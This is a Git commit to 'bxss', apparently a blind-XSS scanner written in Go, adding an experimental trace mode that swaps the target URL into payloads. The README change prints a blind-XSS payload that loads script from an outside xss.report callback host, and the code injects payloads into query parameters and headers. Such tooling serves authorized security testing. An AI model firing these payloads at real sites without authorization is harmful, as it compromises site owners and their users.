feature: added in experimental trace mode

ethicalhackingplayground · ethicalhackingplayground · commit cee9be247eae · 2025-03-16T11:17:48.000+11:00
diff --git a/README.md b/README.md
@@ -58,6 +58,7 @@ go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
 | `-v`          | Enable debug mode                                        | `false`  |
 | `-rl float`   | Rate limit (requests per second)                         | `0`      |
 | `-f`          | Follow redirects                                         | `false`  |
+| `-l`          | Enable Trace Mode (experimental)                          | `false`  |
 ---
 
 ## 🎬 Demonstration
@@ -69,6 +70,13 @@ go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
 
 ---
 
+## 📝 What is Trace mode?
+Trace mode is an experimental feature that allows you to track where the BlindXSS got triggered, some third party BlindXSS platforms such as (https://xss.report/)[https://xss.report/] allows you to specify custom parameters in you're payloads, this allows you to track where the BlindXSS got triggered, for example if you specify the parameter `url=https://somehost.com` in your payload, the tool will use the payload `'"><script src=https://xss.report/c/username?url=https://somehost.com></script>` this for testing and upon a trigger you will be able to inspect the DOM and see what host the BlindXSS got triggered from.
+
+ <img src="https://github.com/ethicalhackingplayground/bxss/blob/master/static/xss.report.png" width="200px" alt="Xss Report">
+
+Make sure when assigning custom parameters in you're dashboard that you assign `url={LINK}` so bxss can automatically replace `{LINK}` with the actual URL. 
+
 ## 🔥 Usage Examples
 
 ### Parameters
diff --git a/static/xss.report.png b/static/xss.report.png
diff --git a/v2/pkg/arguments/arguments.go b/v2/pkg/arguments/arguments.go
@@ -20,6 +20,7 @@ type Arguments struct {
 	Debug           bool
 	RateLimit       float64
 	FollowRedirects bool
+	Trace           bool
 }
 
 // Flag variables
@@ -35,6 +36,7 @@ var (
 	parameters      bool
 	rateLimit       float64
 	followRedirects bool
+	trace           bool
 )
 
 // ValidateArgs validates the arguments passed to the program and prints the
@@ -78,6 +80,7 @@ func NewArguments() *Arguments {
 	flag.BoolVar(&debug, "v", false, "Enable debug mode to view full request details and debug information")
 	flag.Float64Var(&rateLimit, "rl", 0, "Rate limit in requests per second (optional to prevent abuse)")
 	flag.BoolVar(&followRedirects, "f", false, "Follow redirects when testing (optional)")
+	flag.BoolVar(&trace, "l", false, "Enable trace mode to track which host is vulnerable to XSS, if your canary server support custom parameters, insert url={LINK}")
 
 	// Parse the arguments
 	flag.Parse()
@@ -94,5 +97,6 @@ func NewArguments() *Arguments {
 		Debug:           debug,
 		RateLimit:       rateLimit,
 		FollowRedirects: followRedirects,
+		Trace:           trace,
 	}
 }
diff --git a/v2/pkg/payloads/payloads.go b/v2/pkg/payloads/payloads.go
@@ -65,6 +65,7 @@ func (p *PayloadParser) ProcessPayloadsAndHeaders(limiter *rate.Limiter, link st
 		Method:          p.args.Method,
 		FollowRedirects: p.args.FollowRedirects,
 		Debug:           p.args.Debug,
+		Trace:           p.args.Trace,
 	}
 	newScanner := scan.NewScanner(limiter, config)
 	link = p.EnsureProtocol(link)
diff --git a/v2/pkg/scan/scan.go b/v2/pkg/scan/scan.go
@@ -28,6 +28,7 @@ type ScannerConfig struct {
 	FollowRedirects bool
 	Limiter         *rate.Limiter
 	Debug           bool
+	Trace           bool
 }
 
 type Scanner struct {
@@ -65,10 +66,16 @@ func (s *Scanner) Scan(url string, payload string, header string) {
 	}
 	time.Sleep(500 * time.Microsecond)
 	fmt.Println("")
+
 	if header != "" {
 		fmt.Printf(colours.InfoColor, "Using Header: "+header)
 	}
-	if payload != "" {
+	if s.Config.Trace {
+		payload = strings.Replace(payload, "{LINK}", url, 1)
+		fmt.Printf(colours.InfoColor, "**Using Trace Mode**"+"")
+		fmt.Printf(colours.InfoColor, "New Payload:"+payload)
+		fmt.Printf("\n")
+	} else {
 		fmt.Printf(colours.InfoColor, "Using Payload: "+payload)
 		fmt.Printf("\n")
 	}
@@ -120,6 +127,7 @@ func (s *Scanner) MakeRequest(method string, payload string, link string, header
 				fmt.Printf(colours.NoticeColor, "Parameter: "+param)
 				qs.Set(param, payload)
 			}
+
 		}
 		u.RawQuery = qs.Encode()
 	}

Original file line number	Diff line number	Diff line change
`@@ -65,6 +65,7 @@ func (p PayloadParser) ProcessPayloadsAndHeaders(limiter rate.Limiter, link st`
`65`	`65`	`Method: p.args.Method,`
`66`	`66`	`FollowRedirects: p.args.FollowRedirects,`
`67`	`67`	`Debug: p.args.Debug,`
	`68`	`+ Trace: p.args.Trace,`
`68`	`69`	`}`
`69`	`70`	`newScanner := scan.NewScanner(limiter, config)`
`70`	`71`	`link = p.EnsureProtocol(link)`
Original file line number	Diff line number	Diff line change
`@@ -28,6 +28,7 @@ type ScannerConfig struct {`
`28`	`28`	`FollowRedirects bool`
`29`	`29`	`Limiter *rate.Limiter`
`30`	`30`	`Debug bool`
	`31`	`+ Trace bool`
`31`	`32`	`}`
`32`	`33`
`33`	`34`	`type Scanner struct {`
`@@ -65,10 +66,16 @@ func (s *Scanner) Scan(url string, payload string, header string) {`
`65`	`66`	`}`
`66`	`67`	`time.Sleep(500 * time.Microsecond)`
`67`	`68`	`fmt.Println("")`
	`69`	`+`
`68`	`70`	`if header != "" {`
`69`	`71`	`fmt.Printf(colours.InfoColor, "Using Header: "+header)`
`70`	`72`	`}`
`71`		`- if payload != "" {`
	`73`	`+ if s.Config.Trace {`
	`74`	`+ payload = strings.Replace(payload, "{LINK}", url, 1)`
	`75`	`+ fmt.Printf(colours.InfoColor, "Using Trace Mode"+"")`
	`76`	`+ fmt.Printf(colours.InfoColor, "New Payload:"+payload)`
	`77`	`+ fmt.Printf("\n")`
	`78`	`+ } else {`
`72`	`79`	`fmt.Printf(colours.InfoColor, "Using Payload: "+payload)`
`73`	`80`	`fmt.Printf("\n")`
`74`	`81`	`}`
`@@ -120,6 +127,7 @@ func (s *Scanner) MakeRequest(method string, payload string, link string, header`
`120`	`127`	`fmt.Printf(colours.NoticeColor, "Parameter: "+param)`
`121`	`128`	`qs.Set(param, payload)`
`122`	`129`	`}`
	`130`	`+`
`123`	`131`	`}`
`124`	`132`	`u.RawQuery = qs.Encode()`
`125`	`133`	`}`